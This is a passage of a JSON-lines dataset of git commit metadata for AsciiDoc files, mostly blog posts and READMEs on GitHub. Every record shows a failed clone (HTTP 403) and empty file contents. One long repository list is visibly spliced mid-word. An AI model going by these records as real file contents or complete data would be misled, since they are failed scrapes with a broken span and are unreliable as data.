technical-manual.adoc\n","repos":"uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"486f565053813400c993fada77948da3f785fe4e","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/10\/21\/deref.adoc","new_file":"content\/news\/2022\/10\/21\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7edffc38f1e4f7609f3fa4d87856b0c335a608dd","subject":"Create sub.adoc","message":"Create sub.adoc","repos":"jauco\/asciidoctorbug","old_file":"subfolder\/sub.adoc","new_file":"subfolder\/sub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jauco\/asciidoctorbug.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2572652f6bb7502aa098ed797c5227f46321f7c","subject":"Step 5 Update README","message":"Step 5\nUpdate README\n","repos":"Ovea\/bdd-todolist,Ovea\/bdd-todolist","old_file":"step-5\/README.adoc","new_file":"step-5\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ovea\/bdd-todolist.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5d0245ef1fdfb55be17d17dbe065cd7533c72ea","subject":"y2b create post These crazy headphones might blow your mind","message":"y2b create post These crazy headphones might blow your mind","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-07-These-crazy-headphones-might-blow-your-mind.adoc","new_file":"_posts\/2016-07-07-These-crazy-headphones-might-blow-your-mind.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9354403689440c686c389f2c4f8196b361e70b07","subject":"Add blog post about JS","message":"Add blog post about JS\n","repos":"luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org","old_file":"news\/2015-08-10-Javascript-Support-In-Wildfly.adoc","new_file":"news\/2015-08-10-Javascript-Support-In-Wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a905492c0c8fac1f9dd7c13a757af97dfd50709","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c42641c8948a1fd7f00fd9e760e5c18caa0f952a","subject":"y2b create post Unboxing Anki Overdrive","message":"y2b create post Unboxing Anki 
Overdrive","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-28-Unboxing-Anki-Overdrive.adoc","new_file":"_posts\/2015-11-28-Unboxing-Anki-Overdrive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"786cd23b83256978d41b1595975e0d2c2a5d439b","subject":"Link HTTP","message":"Link HTTP\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Rest client Ex.adoc","new_file":"Rest client Ex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7455fbf9334eebebf5e2db59f8224df489ad3baf","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ab66cff4ef41a808a4bf73bce532b7a20e3ca1f","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6a7a838bb4c7c66c3d4ff4b1c5f970efa6e8230","subject":"Update 2017-02-25.adoc","message":"Update 2017-02-25.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25.adoc","new_file":"_posts\/2017-02-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eebf12cd5c3bc1ddedca3d6f55da268578dd2634","subject":"Update 2015-08-02-The-Tree.adoc","message":"Update 2015-08-02-The-Tree.adoc","repos":"conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io,conchitawurst\/conchitawurst.github.io","old_file":"_posts\/2015-08-02-The-Tree.adoc","new_file":"_posts\/2015-08-02-The-Tree.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/conchitawurst\/conchitawurst.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"230388c7b682ac47330641a826ea6a8ee4eb89f9","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) 
(1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fb2f9785010804fa943424a56cb4fe81e9ac09a","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89199c2694689062f0fdd205429196a3ffbe552b","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84889650e5a8d916190b3b92c9f2f5e983b1961f","subject":"Update Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","message":"Update Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_file":"_posts\/Micro-Service-Casual-Talkmd-Microservice-Casual-Talks-20160314.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81146c0506648a1bf5fd4bbada04f8d0a71694d9","subject":"Update 2015-10-11-ATS-HTTPS.adoc","message":"Update 2015-10-11-ATS-HTTPS.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-10-11-ATS-HTTPS.adoc","new_file":"_posts\/2015-10-11-ATS-HTTPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7015e0e44ca4fe6fb7fad0704ccd7cbde456c1d2","subject":"Update 2016-10-07-Test-Blog.adoc","message":"Update 2016-10-07-Test-Blog.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-07-Test-Blog.adoc","new_file":"_posts\/2016-10-07-Test-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"01f1b6ab0c589238dc8953f829adc4a6e9c42f5a","subject":"Update 2017-08-01-Luku-Luku.adoc","message":"Update 2017-08-01-Luku-Luku.adoc","repos":"cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io","old_file":"_posts\/2017-08-01-Luku-Luku.adoc","new_file":"_posts\/2017-08-01-Luku-Luku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cringler\/cringler.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef73bf6e971283083b95e867650d5f444da4d75","subject":"Translate markdown files into asciidoc files","message":"Translate markdown files into asciidoc files\n\nWe are going to convert all of our documentation from markdown to\nasciidoc format, in order to take advantage of the additional features\nand semantic elements that asciidoc offers such as automatic section\nnumbering, admonitions and automatic table of contents (TOC) generation.\n\nConverting README.md by hand is going to be extremely tedious.\n\nAs such, as a step towards the full conversion of our documentation to\nasciidoc, let's enlist the help of pandoc[1] to translate our\ndocumentation.\n\nThe translation is done with pandoc 2.2.1 via this shell script:\n\n for x in $(find -name '*.md'); do\n pandoc -f markdown_github-hard_line_breaks --wrap=preserve --atx-headers -o \"${x%*.md}.adoc\" \"$x\"\n done\n\nWhile the majority of the translation is done faithfully, there are\nstill some errors here and there in the translated files. We will be\nfixing them in subsequent commits.\n\n[1] http:\/\/pandoc.org\/\n","repos":"se-edu\/addressbook-level1,se-edu\/addressbook-level1","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level1.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc027021d5c21897848ceb6ed13989736f3b1f62","subject":"[README] Add badge to Maven Central.","message":"[README] Add badge to Maven Central.","repos":"gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,DevFactory\/afc,gallandarakhneorg\/afc,DevFactory\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc,tpiotrow\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c84234277a0d0fac8bda2bcb5bb29723b259735f","subject":"Moved from Markdown to Asciidoc","message":"Moved from Markdown to Asciidoc\n","repos":"ysb33r\/groovy-vfs,ysb33r\/groovy-vfs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ysb33r\/groovy-vfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edb9e10fcb57c989883a8f5ed5536f3e42f048e0","subject":"Update README.adoc","message":"Update README.adoc\n\nPesky 
colon...","repos":"Adyrhan\/adyrhan.github.io,yahussain\/yahussain.github.io,JithinPavithran\/JithinPavithran.github.io,pointout\/pointout.github.io,glitched01\/glitched01.github.io,ovo-6\/ovo-6.github.io,blahcadepodcast\/blahcadepodcast.github.io,havvazaman\/havvazaman.github.io,willyb321\/willyb321.github.io,buliaoyin\/buliaoyin.github.io,yeddiyarim\/yeddiyarim.github.io,scriptindex\/scriptindex.github.io,uzuyh\/hubpress.io,hubsaysnuaa\/hubsaysnuaa.github.io,jia1miao\/jia1miao.github.io,quangpc\/quangpc.github.io,faldah\/faldah.github.io,rohithkrajan\/rohithkrajan.github.io,mattpearson\/mattpearson.github.io,chris1234p\/chris1234p.github.io,devkamboj\/devkamboj.github.io,sidemachine\/sidemachine.github.io,justafool5\/justafool5.github.io,devananda\/devananda.github.io,pavistalli\/pavistalli.github.io,2wce\/2wce.github.io,jmelfi\/jmelfi.github.io,jblemee\/jblemee.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,Murazaki\/murazaki.github.io,xfarm001\/xfarm001.github.io,chdask\/chdask.github.io,heliomsolivas\/heliomsolivas.github.io,mdinaustin\/mdinaustin.github.io,acristyy\/acristyy.github.io,plaidshirtguy\/plaidshirtguy.github.io,zubrx\/zubrx.github.io,rballan\/rballan.github.io,raghakot\/raghakot.github.io,tjfy1992\/tjfy1992.github.io,frenchduff\/frenchduff.github.io,ricardozanini\/ricardozanini.github.io,murilo140891\/murilo140891.github.io,Ellixo\/ellixo.github.io,rishipatel\/rishipatel.github.io,deivisk\/deivisk.github.io,ovo-6\/ovo-6.github.io,anggadjava\/anggadjava.github.io,endymion64\/endymion64.github.io,Oziabr\/Oziabr.github.io,rpawlaszek\/rpawlaszek.github.io,faldah\/faldah.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,anwfr\/blog.anw.fr,Andy4Craft\/andy4craft.github.io,innovation-jp\/innovation-jp.github.io,gardenias\/sddb.com,nnn-dev\/nnn-dev.github.io,der3k\/der3k.github.io,nnn-dev\/nnn-dev.github.io,chdask\/chdask.github.io,geummo\/geummo.github.io,heliomsolivas\/heliomsolivas.github.io,alchapone\/alchapone.github.io,stay-india\/stay-india.github.io,roelvs\/roelvs.github.io,namlongwp\/namlongwp.github.io,Kif11\/Kif11.github.io,pyxozjhi\/pyxozjhi.github.io,indusbox\/indusbox.github.io,wattsap\/wattsap.github.io,neomobil\/neomobil.github.io,2wce\/2wce.github.io,rage5474\/rage5474.github.io,itsallanillusion\/itsallanillusion.github.io,IdoramNaed\/idoramnaed.github.io,velo\/velo.github.io,deivisk\/deivisk.github.io,nickwanhere\/nickwanhere.github.io,fraslo\/fraslo.github.io,macchandev\/macchandev.github.io,glitched01\/glitched01.github.io,speedcom\/hubpress.io,modmaker\/modmaker.github.io,ashmckenzie\/ashmckenzie.github.io,Bulletninja\/bulletninja.github.io,sitexa\/hubpress.io,jonathandmoore\/jonathandmoore.github.io,devananda\/devananda.github.io,live-smart\/live-smart.github.io,caglarsayin\/hubpress,olavloite\/olavloite.github.io,ferandec\/ferandec.github.io,hirako2000\/hirako2000.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,dvbnrg\/dvbnrg.github.io,TheGertproject\/TheGertproject.github.io,visionui\/visionui.github.io,raditv\/raditv.github.io,qu85101522\/qu85101522.github.io,xumr0x\/xumr0x.github.io,gerdbremer\/gerdbremer.github.io,jia1miao\/jia1miao.github.io,laposheureux\/laposheureux.github.io,GWCATT\/gwcatt.github.io,angilent\/angilent.github.io,popurax\/popurax.github.io,holtalanm\/holtalanm.github.io,AntoineTyrex\/antoinetyrex.github.io,jelitox\/jelitox.github.io,fbridault\/sandblog,Ugotsta\/Ugotsta.github.io,iolabailey\/iolabailey.github.io,hayyuelha\/technical-blog,hfluz\/hf
luz.github.io,pallewela\/pallewela.github.io,suning-wireless\/Suning-Wireless.github.io,Ardemius\/ardemius.github.io,jgornati\/jgornati.github.io,olavloite\/olavloite.github.io,gerdbremer\/gerdbremer.github.io,xfarm001\/xfarm001.github.io,yangjae\/hubpress.io,FilipLaz\/filiplaz.github.io,deformat\/deformat.github.io,jkschneider\/jkschneider.github.io,birvajoshi\/birvajoshi.github.io,sebbrousse\/sebbrousse.github.io,LearningTools\/LearningTools.github.io,deformat\/deformat.github.io,lifengchuan2008\/lifengchuan2008.github.io,Olika120\/Olika120.github.io,gquintana\/gquintana.github.io,ntfnd\/ntfnd.github.io,reggert\/reggert.github.io,live-smart\/live-smart.github.io,thomaszahr\/thomaszahr.github.io,grzrobak\/grzrobak.github.io,wiibaa\/wiibaa.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,Aerodactyl\/aerodactyl.github.io,fbruch\/fbruch.github.com,murilo140891\/murilo140891.github.io,zubrx\/zubrx.github.io,fuzzy-logic\/fuzzy-logic.github.io,javathought\/javathought.github.io,qu85101522\/qu85101522.github.io,cmolitor\/blog,djmdata\/djmdata.github.io,kay\/kay.github.io,DullestSaga\/dullestsaga.github.io,ghostbind\/ghostbind.github.io,neomobil\/neomobil.github.io,noahrc\/noahrc.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,yysk\/yysk.github.io,skeate\/skeate.github.io,ron194\/ron194.github.io,nicolasmaurice\/nicolasmaurice.github.io,stay-india\/stay-india.github.io,uskithub\/uskithub.github.io,Dhuck\/dhuck.github.io,hinaloe\/hubpress,endymion64\/VinJBlog,alchemistcookbook\/alchemistcookbook.github.io,esbrannon\/esbrannon.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,SuperMMX\/supermmx.github.io,kay\/kay.github.io,anuragsingh31\/anuragsingh31.github.io,caryfitzhugh\/caryfitzhugh.github.io,miroque\/shirokuma,jonathandmoore\/jonathandmoore.github.io,tongqqiu\/tongqqiu.github.io,chrizco\/chrizco.github.io,jblemee\/jblemee.github.io,mattburnin\/hubpress.io,rlebron88\/rlebron88.github.io,christiannolte\/hubpress.io,pdudits\/pdudits.github.io,murilo140891\/murilo140891.github.io,gorjason\/gorjason.github.io,flug\/flug.github.io,tr00per\/tr00per.github.io,dsp25no\/blog.dsp25no.ru,jcsirot\/hubpress.io,caseyy\/caseyy.github.io,fbiville\/fbiville.github.io,karcot\/trial1,thrasos\/thrasos.github.io,deunz\/deunz.github.io,rohithkrajan\/rohithkrajan.github.io,thrasos\/thrasos.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,jankolorenc\/jankolorenc.github.io,elidiazgt\/mind,thykka\/thykka.github.io,abien\/abien.github.io,dobin\/dobin.github.io,siarlex\/siarlex.github.io,pzmarzly\/pzmarzly.github.io,yeddiyarim\/yeddiyarim.github.io,DullestSaga\/dullestsaga.github.io,lxjk\/lxjk.github.io,darsto\/darsto.github.io,gdfuentes\/gdfuentes.github.io,daemotron\/daemotron.github.io,jlboes\/jlboes.github.io,elvarb\/elvarb.github.io,ron194\/ron194.github.io,lerzegov\/lerzegov.github.io,deunz\/deunz.github.io,Rackcore\/Rackcore.github.io,allancorra\/allancorra.github.io,chbailly\/chbailly.github.io,zestyroxy\/zestyroxy.github.io,xmichaelx\/xmichaelx.github.io,hyha600\/hyha600.github.io,chakbun\/chakbun.github.io,cringler\/cringler.github.io,ahopkins\/amhopkins.com,soyabeen\/soyabeen.github.io,deunz\/deunz.github.io,kai-cn\/kai-cn.github.io,al1enSuu\/al1enSuu.github.io,cloudmind7\/cloudmind7.github.com,ioisup\/ioisup.github.io,lxjk\/lxjk.github.io,alimasyhur\/alimasyhur.github.io,vanpelt\/vanpelt.github.io,jbroszat\/jbroszat.github.io,xavierdono\/xavierdono.github.io,PertuyF\/PertuyF.github.io,raloliver\/raloliver.github.io,sfoubert\/sfoubert
.github.io,fasigpt\/fasigpt.github.io,gruenberg\/gruenberg.github.io,FRC125\/FRC125.github.io,Bloggerschmidt\/bloggerschmidt.de,thykka\/thykka.github.io,parkowski\/parkowski.github.io,ashmckenzie\/ashmckenzie.github.io,fasigpt\/fasigpt.github.io,rpwolff\/rpwolff.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,furcon\/furcon.github.io,conchitawurst\/conchitawurst.github.io,sandersky\/sandersky.github.io,shinchiro\/shinchiro.github.io,foxsofter\/hubpress.io,CreditCardsCom\/creditcardscom.github.io,hinaloe\/hubpress,iwakuralai-n\/badgame-site,silesnet\/silesnet.github.io,kai-cn\/kai-cn.github.io,triskell\/triskell.github.io,kreids\/kreids.github.io,bretonio\/bretonio.github.io,cloudmind7\/cloudmind7.github.com,sebbrousse\/sebbrousse.github.io,deruelle\/deruelle.github.io,camilo28\/camilo28.github.io,MartinAhrer\/martinahrer.github.io,gjagush\/gjagush.github.io,allancorra\/allancorra.github.io,blater\/blater.github.io,fqure\/fqure.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,saptaksen\/saptaksen.github.io,debbiezhu\/debbiezhu.github.io,minditech\/minditech.github.io,diogoan\/diogoan.github.io,eduardo76609\/eduardo76609.github.io,homenslibertemse\/homenslibertemse.github.io,kr-b\/kr-b.github.io,iolabailey\/iolabailey.github.io,realraindust\/realraindust.github.io,deivisk\/deivisk.github.io,crisgoncalves\/crisgoncalves.github.io,mouseguests\/mouseguests.github.io,woehrl01\/woehrl01.hubpress.io,speedcom\/hubpress.io,rballan\/rballan.github.io,IdoramNaed\/idoramnaed.github.io,djmdata\/djmdata.github.io,cringler\/cringler.github.io,cloudmind7\/cloudmind7.github.com,amodig\/amodig.github.io,fuhrerscene\/fuhrerscene.github.io,PierreBtz\/pierrebtz.github.io,xavierdono\/xavierdono.github.io,patricekrakow\/patricekrakow.github.io,harquail\/harquail.github.io,realraindust\/realraindust.github.io,metasean\/blog,caglarsayin\/hubpress,crimarde\/crimarde.github.io,juliardi\/juliardi.github.io,twentyTwo\/twentyTwo.github.io,davehardy20\/davehardy20.github.io,atfd\/hubpress.io,jlboes\/jlboes.github.io,simevidas\/simevidas.github.io,livehua\/livehua.github.io,birvajoshi\/birvajoshi.github.io,scriptindex\/scriptindex.github.io,elidiazgt\/mind,railsdev\/railsdev.github.io,Adyrhan\/adyrhan.github.io,nickwanhere\/nickwanhere.github.io,neurodiversitas\/neurodiversitas.github.io,everydaynormalgeek\/everydaynormalgeek.github.io,triskell\/triskell.github.io,esbrannon\/esbrannon.github.io,backemulus\/backemulus.github.io,extrapolate\/extrapolate.github.io,Vanilla-Java\/vanilla-java.github.io,codechunks\/codechunks.github.io,sinemaga\/sinemaga.github.io,spikebachman\/spikebachman.github.io,masonc15\/masonc15.github.io,Aerodactyl\/aerodactyl.github.io,bithunshal\/shalsblog,prateekjadhwani\/prateekjadhwani.github.io,jaganz\/jaganz.github.io,GDGSriLanka\/blog,Zatttch\/zatttch.github.io,itsallanillusion\/itsallanillusion.github.io,christianmtr\/christianmtr.github.io,evolgenomology\/evolgenomology.github.io,romanegunkov\/romanegunkov.github.io,hubsaysnuaa\/hubsaysnuaa.github.io,havvazaman\/havvazaman.github.io,hapee\/hapee.github.io,Joecakes4u\/joecakes4u.github.io,fabself\/fabself.github.io,jaslyn94\/jaslyn94.github.io,sebasmonia\/sebasmonia.github.io,eunas\/eunas.github.io,gardenias\/sddb.com,tripleonard\/tripleonard.github.io,arthurmolina\/arthurmolina.github.io,enderxyz\/enderxyz.github.io,bretonio\/bretonio.github.io,tongqqiu\/tongqqiu.github.io,sebbrousse\/sebbrousse.github.io,chdask\/chdask.github.io,kunicmarko20\/kunicmarko20.github.io,extrapolate\/extrapo
ode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"603e0a21f52f8e350c2c4c09e1e478ad9913682b","subject":"update copyright year","message":"update copyright year\n","repos":"getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3304055fe85a744bb52b3e635e1d78be474aeba2","subject":"MSA day blogpost","message":"MSA day blogpost\n","repos":"msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,msavy\/apiman.github.io,kahboom\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io,apiman\/apiman.github.io,kahboom\/apiman.github.io,kahboom\/apiman.github.io,apiman\/apiman.github.io,msavy\/apiman.github.io","old_file":"_blog-src\/_posts\/2015-06-15-apiman-msa-day.adoc","new_file":"_blog-src\/_posts\/2015-06-15-apiman-msa-day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kahboom\/apiman.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"250c45ef69f0808d1507296a7fcf09c937b34955","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d05119219639d381a7e1e853f4f0b120abde4e73","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1c8a5087006f086ea23eb23d3cf4be968850ce7","subject":"Update 2016-09-26-Product-first-Research.adoc","message":"Update 2016-09-26-Product-first-Research.adoc","repos":"ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io,ilyaeck\/ilyaeck.github.io","old_file":"_posts\/2016-09-26-Product-first-Research.adoc","new_file":"_posts\/2016-09-26-Product-first-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilyaeck\/ilyaeck.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 